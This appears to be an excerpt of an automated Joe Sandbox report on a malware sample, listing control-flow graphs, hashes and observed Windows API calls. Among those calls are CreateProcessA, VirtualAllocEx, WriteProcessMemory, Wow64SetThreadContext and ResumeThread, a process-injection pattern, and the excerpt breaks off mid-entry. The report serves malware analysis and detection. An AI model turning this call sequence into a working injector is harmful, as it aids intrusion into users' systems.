                                          control_flow_graph 693 764afcc-764afce 694 764afd7-764afd9 693->694 695 764afd0-764afd2 693->695 697 764afdb-764b06d 694->697 696 764afd4 695->696 695->697 696->694 700 764b0a6-764b0c6 697->700 701 764b06f-764b079 697->701 706 764b0ff-764b12e 700->706 707 764b0c8-764b0d2 700->707 701->700 702 764b07b-764b07d 701->702 704 764b0a0-764b0a3 702->704 705 764b07f-764b089 702->705 704->700 708 764b08d-764b09c 705->708 709 764b08b 705->709 715 764b167-764b221 CreateProcessA 706->715 716 764b130-764b13a 706->716 707->706 711 764b0d4-764b0d6 707->711 708->708 710 764b09e 708->710 709->708 710->704 712 764b0d8-764b0e2 711->712 713 764b0f9-764b0fc 711->713 717 764b0e4 712->717 718 764b0e6-764b0f5 712->718 713->706 729 764b223-764b229 715->729 730 764b22a-764b2b0 715->730 716->715 719 764b13c-764b13e 716->719 717->718 718->718 720 764b0f7 718->720 721 764b140-764b14a 719->721 722 764b161-764b164 719->722 720->713 724 764b14c 721->724 725 764b14e-764b15d 721->725 722->715 724->725 725->725 726 764b15f 725->726 726->722 729->730 740 764b2c0-764b2c4 730->740 741 764b2b2-764b2b6 730->741 743 764b2d4-764b2d8 740->743 744 764b2c6-764b2ca 740->744 741->740 742 764b2b8 741->742 742->740 746 764b2e8-764b2ec 743->746 747 764b2da-764b2de 743->747 744->743 745 764b2cc 744->745 745->743 749 764b2fe-764b305 746->749 750 764b2ee-764b2f4 746->750 747->746 748 764b2e0 747->748 748->746 751 764b307-764b316 749->751 752 764b31c 749->752 750->749 751->752 754 764b31d 752->754 754->754
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0764B20E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 428097636209a8fce6233bfb4b93644d16a48d1091aec3c4b08830993006502a
                                          • Instruction ID: 5f6cc61a62f69ae2ad241c53ee0c4ced7ef33eba495b124fadbe00e29049a490
                                          • Opcode Fuzzy Hash: 428097636209a8fce6233bfb4b93644d16a48d1091aec3c4b08830993006502a
                                          • Instruction Fuzzy Hash: A9A15CB1D00759DFEB24CFA9C841BEEBBB2BF48310F148569D819A7280DB749985CF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 755 764afd8-764b06d 758 764b0a6-764b0c6 755->758 759 764b06f-764b079 755->759 764 764b0ff-764b12e 758->764 765 764b0c8-764b0d2 758->765 759->758 760 764b07b-764b07d 759->760 762 764b0a0-764b0a3 760->762 763 764b07f-764b089 760->763 762->758 766 764b08d-764b09c 763->766 767 764b08b 763->767 773 764b167-764b221 CreateProcessA 764->773 774 764b130-764b13a 764->774 765->764 769 764b0d4-764b0d6 765->769 766->766 768 764b09e 766->768 767->766 768->762 770 764b0d8-764b0e2 769->770 771 764b0f9-764b0fc 769->771 775 764b0e4 770->775 776 764b0e6-764b0f5 770->776 771->764 787 764b223-764b229 773->787 788 764b22a-764b2b0 773->788 774->773 777 764b13c-764b13e 774->777 775->776 776->776 778 764b0f7 776->778 779 764b140-764b14a 777->779 780 764b161-764b164 777->780 778->771 782 764b14c 779->782 783 764b14e-764b15d 779->783 780->773 782->783 783->783 784 764b15f 783->784 784->780 787->788 798 764b2c0-764b2c4 788->798 799 764b2b2-764b2b6 788->799 801 764b2d4-764b2d8 798->801 802 764b2c6-764b2ca 798->802 799->798 800 764b2b8 799->800 800->798 804 764b2e8-764b2ec 801->804 805 764b2da-764b2de 801->805 802->801 803 764b2cc 802->803 803->801 807 764b2fe-764b305 804->807 808 764b2ee-764b2f4 804->808 805->804 806 764b2e0 805->806 806->804 809 764b307-764b316 807->809 810 764b31c 807->810 808->807 809->810 812 764b31d 810->812 812->812
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0764B20E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 36872ac7e3ec884a6c17bf5fc8fce94556f558c2c041af67e12a01c33e68f55f
                                          • Instruction ID: 09b3922019b084d23c00b5a5dbcbba944ed3700d20ae74f431c0c99f4a356942
                                          • Opcode Fuzzy Hash: 36872ac7e3ec884a6c17bf5fc8fce94556f558c2c041af67e12a01c33e68f55f
                                          • Instruction Fuzzy Hash: EF916CB1D00759CFEB24CF69C840BEEBBB2BF48310F148569D819A7280DB749985CF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 813 306b519-306b537 814 306b563-306b567 813->814 815 306b539-306b546 call 3069f98 813->815 816 306b57b-306b5bc 814->816 817 306b569-306b573 814->817 822 306b55c 815->822 823 306b548 815->823 824 306b5be-306b5c6 816->824 825 306b5c9-306b5d7 816->825 817->816 822->814 870 306b54e call 306b7c0 823->870 871 306b54e call 306b7b1 823->871 824->825 826 306b5fb-306b5fd 825->826 827 306b5d9-306b5de 825->827 830 306b600-306b607 826->830 831 306b5e0-306b5e7 call 306b1e0 827->831 832 306b5e9 827->832 828 306b554-306b556 828->822 829 306b698-306b716 828->829 863 306b71d-306b758 829->863 864 306b718-306b71c 829->864 834 306b614-306b61b 830->834 835 306b609-306b611 830->835 833 306b5eb-306b5f9 831->833 832->833 833->830 837 306b61d-306b625 834->837 838 306b628-306b631 call 306b1f0 834->838 835->834 837->838 844 306b633-306b63b 838->844 845 306b63e-306b643 838->845 844->845 846 306b645-306b64c 845->846 847 306b661-306b66e 845->847 846->847 849 306b64e-306b65e call 306b200 call 306b210 846->849 853 306b670-306b68e 847->853 854 306b691-306b697 847->854 849->847 853->854 865 306b760-306b78b GetModuleHandleW 863->865 866 306b75a-306b75d 863->866 864->863 867 306b794-306b7a8 865->867 868 306b78d-306b793 865->868 866->865 868->867 870->828 871->828
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0306B77E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: e211437a8e82d500de6eafcf8a3fadaa90ac1273a9d38be949be3e813eaac429
                                          • Instruction ID: 23ce951370f277514290bf5921eda7f544ee818eda4c8d4b4903028641e6d63d
                                          • Opcode Fuzzy Hash: e211437a8e82d500de6eafcf8a3fadaa90ac1273a9d38be949be3e813eaac429
                                          • Instruction Fuzzy Hash: 1A8166B0A01B058FDB64DF2AD45079ABBF5FF88300F048A6DE08ACBA54D774E945CB91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 990 3065e54-3065e5e 991 3065e65-3065f21 CreateActCtxA 990->991 992 3065e60-3065e64 990->992 994 3065f23-3065f29 991->994 995 3065f2a-3065f84 991->995 992->991 994->995 1002 3065f86-3065f89 995->1002 1003 3065f93-3065f97 995->1003 1002->1003 1004 3065fa8 1003->1004 1005 3065f99-3065fa5 1003->1005 1007 3065fa9 1004->1007 1005->1004 1007->1007
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 03065F11
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 40f013c2b7bc350ffbf0571aa6e4186e10a582211acf4e1a7210927dbf5a14a3
                                          • Instruction ID: 8e4a9dacdca106a62ec3ec47fc277659f1d4df14a5f2afbe939f01a11ecd0302
                                          • Opcode Fuzzy Hash: 40f013c2b7bc350ffbf0571aa6e4186e10a582211acf4e1a7210927dbf5a14a3
                                          • Instruction Fuzzy Hash: 0941C0B0D01719CBDB24DFA9C844B8EBBF5BF49304F24806AD418AB255D7B16946CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1008 3064a60-3065f21 CreateActCtxA 1012 3065f23-3065f29 1008->1012 1013 3065f2a-3065f84 1008->1013 1012->1013 1020 3065f86-3065f89 1013->1020 1021 3065f93-3065f97 1013->1021 1020->1021 1022 3065fa8 1021->1022 1023 3065f99-3065fa5 1021->1023 1025 3065fa9 1022->1025 1023->1022 1025->1025
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 03065F11
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 9de099235f84ad03b32a0c932c81413e2ccf9c413b09f36f5fc9062a2e46dc79
                                          • Instruction ID: eacfdefe602188fb7964402895542e593f76e3520900d44cad1f82e86cea1bd4
                                          • Opcode Fuzzy Hash: 9de099235f84ad03b32a0c932c81413e2ccf9c413b09f36f5fc9062a2e46dc79
                                          • Instruction Fuzzy Hash: E641CFB0C0171DCBDB28DFA9C844B9DBBF5BF49304F20806AD408AB255D7B16986CF90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1026 764aa39-764aa3a 1027 764aa43-764aacd ReadProcessMemory 1026->1027 1028 764aa3c-764aa41 1026->1028 1033 764aad6-764ab06 1027->1033 1034 764aacf-764aad5 1027->1034 1028->1027 1034->1033
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0764AAC0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 9fb944b953adc6ac1d147c7aada36a8c3ccbcdaffc54d9292ac622b075db5dc3
                                          • Instruction ID: afb942d4037845933191cedddd009cc9f6c815a279ec923dfeb0de31d57b263d
                                          • Opcode Fuzzy Hash: 9fb944b953adc6ac1d147c7aada36a8c3ccbcdaffc54d9292ac622b075db5dc3
                                          • Instruction Fuzzy Hash: E8216BB2D00349AFDB10DFAAC8417EEBBF1FF48310F10842AD959A7640C7749981CBA0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1038 764a949-764a94a 1039 764a953-764a99e 1038->1039 1040 764a94c 1038->1040 1047 764a9a0-764a9ac 1039->1047 1048 764a9ae-764a9c7 1039->1048 1041 764a94e-764a951 1040->1041 1042 764a9ca-764a9ed WriteProcessMemory 1040->1042 1041->1039 1045 764a9f6-764aa26 1042->1045 1046 764a9ef-764a9f5 1042->1046 1046->1045 1047->1048 1048->1042
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0764A9E0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: d4c97f1c88ea264fa878cb6289f25867786775d891cb6cd768215c697713aff4
                                          • Instruction ID: 55f83919c19d7bd9280abb1de9a0416b57792b5f8caf9a56c379bf332076eec0
                                          • Opcode Fuzzy Hash: d4c97f1c88ea264fa878cb6289f25867786775d891cb6cd768215c697713aff4
                                          • Instruction Fuzzy Hash: 122137B6D103599FDB10CFAAC8817EEBBF5FF48310F10842AE959A7241C7789940CBA0
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0764A9E0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: a4a4f8573b0ab930b922a676f61ecefa4ef2ad53924fe3fc8637465cd9064d7a
                                          • Instruction ID: 8d5606f7421763001d0e882e1f2d03b684c424a5398bfea4ebff2ec1764262e2
                                          • Opcode Fuzzy Hash: a4a4f8573b0ab930b922a676f61ecefa4ef2ad53924fe3fc8637465cd9064d7a
                                          • Instruction Fuzzy Hash: 052127B1D003599FDB14DFAAC881BDEBBF5FF48310F10842AE959A7240C7789944CBA0
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0764A3FE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: b6d7b84d9826b1c79315398a46430e876e998792416a0404d40f50fc5913dd4e
                                          • Instruction ID: 611b417c8e6a6174c55381d433cf119a909e145118c0601c897b346ad70ea2b6
                                          • Opcode Fuzzy Hash: b6d7b84d9826b1c79315398a46430e876e998792416a0404d40f50fc5913dd4e
                                          • Instruction Fuzzy Hash: 64216AB1D003099FDB10DFAAC4847EEBBF4EF48214F14C429D859A7241CB78A985CFA0
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0306DA8F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: e7bede00ba5bd7233f51d616f1fc3f3febcef427a117088cf2540e391878c8c6
                                          • Instruction ID: c0f6a65bb78652cf8688d06fff8020b709a9e7ce95fd6931d47f1dc2999bb663
                                          • Opcode Fuzzy Hash: e7bede00ba5bd7233f51d616f1fc3f3febcef427a117088cf2540e391878c8c6
                                          • Instruction Fuzzy Hash: B121E3B5D012499FDB10CFAAD984BEEBBF5FB08310F14841AE958A7350D378A954CF64
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0764A3FE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 9d2d75fa44592d79410326bc71a6ba112cbe75871a0cf340e4a4c66bb1521f70
                                          • Instruction ID: efe5e921e597f107bce7ec9d8054877e017f9a844aad552308954c0dc73d00c5
                                          • Opcode Fuzzy Hash: 9d2d75fa44592d79410326bc71a6ba112cbe75871a0cf340e4a4c66bb1521f70
                                          • Instruction Fuzzy Hash: CF2135B1D003099FDB14DFAAC4847EEBBF5EF88224F14842AD519A7241CB78A945CFA0
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0764AAC0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: b85ce31d7d9d484c5195056fd8eaa8f1f77a5a3ecd983da276061b4ecd0e97f4
                                          • Instruction ID: 87bfbef9eb7834c1dc67bbc70b66335641b3772a13bdc7deb14f416a08cd97bc
                                          • Opcode Fuzzy Hash: b85ce31d7d9d484c5195056fd8eaa8f1f77a5a3ecd983da276061b4ecd0e97f4
                                          • Instruction Fuzzy Hash: C62128B1D003599FDB10DFAAC880BEEBBF5FF48310F548429E959A7240D7789945CBA0
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0306DA8F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 8fd6dcabac2872331c92a7bdd3c53b3eeae0d97bd88e2cfaefafe92f8cc6fb32
                                          • Instruction ID: 64fbdec27c5598edbad3a73a9457313697ee4906426727d1be5997d5e1370a31
                                          • Opcode Fuzzy Hash: 8fd6dcabac2872331c92a7bdd3c53b3eeae0d97bd88e2cfaefafe92f8cc6fb32
                                          • Instruction Fuzzy Hash: 5921E0B59002499FDB10CFAAD884AEEBBF9EB48310F14841AE918A7250D374A940CFA4
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0306B7F9,00000800,00000000,00000000), ref: 0306BA0A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 88fe2e601043b5ecc861cec6348d24ce6f13ecb706590786a82e44c4e6a5ffd4
                                          • Instruction ID: 7eb2ef8d9f98c7dd4bad55cc06c3f53fc4258423798faf3ae6b53187919f4be5
                                          • Opcode Fuzzy Hash: 88fe2e601043b5ecc861cec6348d24ce6f13ecb706590786a82e44c4e6a5ffd4
                                          • Instruction Fuzzy Hash: DB1126B6D013498FDB24DF9AC844BDEFBF5EB88310F14842AD559A7200C375A545CFA5
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0764A8FE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 462d19cf09878cb5b0fee046de2d7fe31223b18c689e1184ab4c1c69df0fba33
                                          • Instruction ID: 90b55b0cbfb895598d6abdf1ab6b4a7e34fae874a005ed2c2e68767a309b56c1
                                          • Opcode Fuzzy Hash: 462d19cf09878cb5b0fee046de2d7fe31223b18c689e1184ab4c1c69df0fba33
                                          • Instruction Fuzzy Hash: 5C1159B18003499FDB20DFAAC8447EFBBF5EF88324F248819E559A7250C775A941CBA1
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0306B7F9,00000800,00000000,00000000), ref: 0306BA0A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 63207d6a37c06af16d5212fc9f3a89cd6191403bdc79c22128add5a119091e33
                                          • Instruction ID: 041d6f8fc428295863450ca9ff7de2e9380f4884168bfa84777e3ef039d4d55f
                                          • Opcode Fuzzy Hash: 63207d6a37c06af16d5212fc9f3a89cd6191403bdc79c22128add5a119091e33
                                          • Instruction Fuzzy Hash: 5211F6B6D003499FDB24DF9AD844BDEFBF5EB48310F14842AD919A7200C375A945CFA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: c67cb55804f692a7c44bfa25e33c8c758dd00128ecf24497fd25329ef04f5276
                                          • Instruction ID: 16da31b871d7982d483ccefd5467a042ed4fce3667214c047377556d45e221ab
                                          • Opcode Fuzzy Hash: c67cb55804f692a7c44bfa25e33c8c758dd00128ecf24497fd25329ef04f5276
                                          • Instruction Fuzzy Hash: 55117CB1C003488BDB24DFAAD4457DFFBF5AF48324F248819C919A7640CB79A945CB94
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0764A8FE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 104207b93d7f86078cff42faaa5a8c77e7147e34d5feb493a29b6efcdf23a710
                                          • Instruction ID: da9872389cf4b6d6d8588a08b88f5d729ed7035c79715dd18215e12d368afe10
                                          • Opcode Fuzzy Hash: 104207b93d7f86078cff42faaa5a8c77e7147e34d5feb493a29b6efcdf23a710
                                          • Instruction Fuzzy Hash: E6113A71D003499FDB24DFAAC8447EEBBF5EF48314F148419D515A7250C775A940CFA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 9ea7a7f7c4e47d4974a93daf04c3683590677758d012c87d35f97c07ce3c4d66
                                          • Instruction ID: f210ec81356c2dea346302f3e6a371d52212d73c2332d824f4e229763572a1a3
                                          • Opcode Fuzzy Hash: 9ea7a7f7c4e47d4974a93daf04c3683590677758d012c87d35f97c07ce3c4d66
                                          • Instruction Fuzzy Hash: D31128B1D003498FDB24DFAAC4457DEFBF5AF88324F248819D519A7240C675A945CBA4
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0306B77E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 6ce0985daf6bc6696d283f40492ff584f8cdf296fe1141a692c4df9de9fd46af
                                          • Instruction ID: 969d67593c37ac9799eb3bf1cc20bd73c4c5d76c0ecbd46268386fddc177cae3
                                          • Opcode Fuzzy Hash: 6ce0985daf6bc6696d283f40492ff584f8cdf296fe1141a692c4df9de9fd46af
                                          • Instruction Fuzzy Hash: 1F110FB6C017498FDB20DF9AC444BDEFBF5EB88210F14842AD828A7210C379A545CFA1
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0764DBED
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 9eed12eb8a16d1495473bda19c37bf7ced761139b462ed161b8341ca3826968e
                                          • Instruction ID: 0de8c37bdd08aad12c8e5172ddca24ba7ab4a55d23117a03f457cef93447cb3d
                                          • Opcode Fuzzy Hash: 9eed12eb8a16d1495473bda19c37bf7ced761139b462ed161b8341ca3826968e
                                          • Instruction Fuzzy Hash: B31103B5D00749DFDB20DF9AD885BDEBBF8EB48310F10845AEA19A7200C375A944CFA5
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0764DBED
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 6d83f5b4792fd46b46f46be20bb2c8fd9bda1642861c42147db268db11cfed5f
                                          • Instruction ID: 62c08ed1be1923218cd49aeadf04cca467b7747913e7b5b120ed4f456d8f7b98
                                          • Opcode Fuzzy Hash: 6d83f5b4792fd46b46f46be20bb2c8fd9bda1642861c42147db268db11cfed5f
                                          • Instruction Fuzzy Hash: 3D1103B68007499FDB20DF9AD845BDEFBF8FB48320F20841AD559A7240C375A944CFA1
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1317998382.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_300d000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 256d51e42d3608de2b658cfa95d43f7eabb3c4f8c11fcf5c83ecded6690fdd95
                                          • Instruction ID: d4a551fd1347e7808485f32c1518aa942ae9849dc5a17f4b39b7fefc5da58a5b
                                          • Opcode Fuzzy Hash: 256d51e42d3608de2b658cfa95d43f7eabb3c4f8c11fcf5c83ecded6690fdd95
                                          • Instruction Fuzzy Hash: B82128B1504204DFEB05DF54D9C0B2AFBA5FB84324F24C5A9E90A0B696C336E456CAB2
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1318046407.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_301d000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c569096feea3acfd00e670bb5bad6c7598040a3185f57566b2f85855d934207e
                                          • Instruction ID: fb6a492e4b0292d69407e5eaa7721150f3c73b6b71568dfac03f00cf5c64b651
                                          • Opcode Fuzzy Hash: c569096feea3acfd00e670bb5bad6c7598040a3185f57566b2f85855d934207e
                                          • Instruction Fuzzy Hash: 30214971504300EFDB05DF14D5C0B39FBA5FB94314F24CAADE8094B242C336D456CA61
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1318046407.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_301d000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a82287c2eb505c3e2cd714a6a1e2a073207e8e02b5e0eeec145f4c99dc6acae6
                                          • Instruction ID: d38e8e432402b1fcbb0c90e1d46e18bc8687729f5fd3401e369710d1f84e0265
                                          • Opcode Fuzzy Hash: a82287c2eb505c3e2cd714a6a1e2a073207e8e02b5e0eeec145f4c99dc6acae6
                                          • Instruction Fuzzy Hash: B2210475604344DFDB16DF14D9C0B2ABBA5FB84314F28C9ADD90A4B246C33BD867CA62
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.1318046407.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_301d000_GhrKoSGuCdvpJ.jbxd
                                          Similarity
